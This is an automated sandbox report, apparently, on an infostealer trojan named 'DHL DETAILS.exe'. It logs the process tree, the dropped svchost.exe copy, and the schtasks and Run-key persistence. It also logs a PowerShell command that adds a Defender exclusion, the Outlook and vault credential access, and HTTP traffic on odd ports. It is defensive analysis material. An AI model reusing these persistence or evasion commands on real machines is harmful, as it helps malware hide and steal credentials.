Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll

Source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE

Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: VHFSQv.exe, 00000020.00000002.2810375396.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Users\user\AppData\Roaming\VHFSQv\<.sln10"(
Source: VHFSQv.exe, 00000018.00000000.2615101482.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
Source: VHFSQv.exe, 00000018.00000002.2644557295.0000000001517000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Users\user\AppData\Roaming\VHFSQv\<.slntA
Source: VHFSQv.exe, 00000018.00000000.2615101482.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: VHFSQv.exe, 00000018.00000000.2615101482.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
Source: VHFSQv.exe, 00000018.00000002.2665284282.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, VHFSQv.exe, 00000020.00000002.2814676821.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $]q,C:\Users\user\AppData\Roaming\VHFSQv\*.sln
Source: VHFSQv.exe, 00000018.00000002.2665284282.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, VHFSQv.exe, 00000018.00000000.2615101482.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmp, VHFSQv.exe, 00000020.00000002.2814676821.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: *.sln
Source: VHFSQv.exe, 00000018.00000000.2615101482.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: MSBuild MyApp.csproj /t:Clean
Source: VHFSQv.exe, 00000018.00000000.2615101482.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: /ignoreprojectextensions:.sln
Source: VHFSQv.exe, 00000018.00000000.2615101482.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@61/28@7/100

Source: C:\Users\user\Desktop\DHL DETAILS.exe

File created: C:\Users\user\AppData\Roaming\svchost.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:48908:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess43312
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess56176
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:62308:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:63200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:48136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:43144:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess43080
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:43104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:82140:120:WilError_03

Source: C:\Users\user\Desktop\DHL DETAILS.exe

File created: C:\Users\user\AppData\Local\Temp\tmp5A0E.tmp

Jump to behavior

Source: C:\Users\user\Desktop\DHL DETAILS.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5A0E.tmp.bat""

Source: DHL DETAILS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: DHL DETAILS.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\DHL DETAILS.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL DETAILS.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DHL DETAILS.exe	ReversingLabs: Detection: 52%
Source: DHL DETAILS.exe	Virustotal: Detection: 35%

Source: C:\Users\user\Desktop\DHL DETAILS.exe

File read: C:\Users\user\Desktop\DHL DETAILS.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DHL DETAILS.exe C:\Users\user\Desktop\DHL DETAILS.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5A0E.tmp.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 43312 -ip 43312
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 43312 -s 155960
Source: unknown	Process created: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe "C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe"
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 484 -p 56176 -ip 56176
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 56176 -s 44056
Source: unknown	Process created: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe "C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe"
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 544 -p 43080 -ip 43080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 43080 -s 96472
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5A0E.tmp.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 43312 -ip 43312
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 43312 -s 155960
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 484 -p 56176 -ip 56176
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 56176 -s 44056
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 544 -p 43080 -ip 43080
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 43080 -s 96472
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\DHL DETAILS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\svchost.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Source: DHL DETAILS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: DHL DETAILS.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: DHL DETAILS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Xml.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.ni.pdbRSDS source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Net.Http.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1829.tmp.dmp.40.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Configuration.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Xml.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER1829.tmp.dmp.40.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Core.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: mscorlib.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Net.Http.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Management.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Drawing.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: VHFSQv.exe, 00000018.00000000.2615101482.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Management.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: caspol.pdb source: VHFSQv.exe.16.dr
Source:	Binary string: System.Core.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Windows.Forms.pdbIL_STUB_PInvoke source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Net.Http.ni.pdbRSDS source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER1829.tmp.dmp.40.dr

Source: DHL DETAILS.exe

Static PE information: 0xC398581B [Tue Dec 26 19:12:27 2073 UTC]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_015869A9 push es; retf 0005h	16_2_015869AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0158FC3C pushad ; iretd	16_2_0158FC3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0675FCC7 push es; retf	16_2_0675FCC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_06781EFF pushfd ; retf 0005h	16_2_06781F0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_06781F2F pushfd ; retf 0005h	16_2_06781F3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0678A43E push 8B040040h; iretd	16_2_0678A443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_06781AC8 push ss; retf 5505h	16_2_06781AD6

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\Desktop\DHL DETAILS.exe

File created: C:\Users\user\AppData\Roaming\svchost.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe			Jump to dropped file
Source: C:\Users\user\Desktop\DHL DETAILS.exe	File created: C:\Users\user\AppData\Roaming\svchost.exe			Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\DHL DETAILS.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VHFSQv

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'

Source: C:\Users\user\Desktop\DHL DETAILS.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VHFSQv
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VHFSQv

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe:Zone.Identifier read attributes \| delete
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe:Zone.Identifier read attributes \| delete
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe:Zone.Identifier read attributes \| delete

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 58378
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 37592
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 35774
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 57320
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 58839
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 32896
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 6821
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 9080
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 25697
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 48962
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 4145
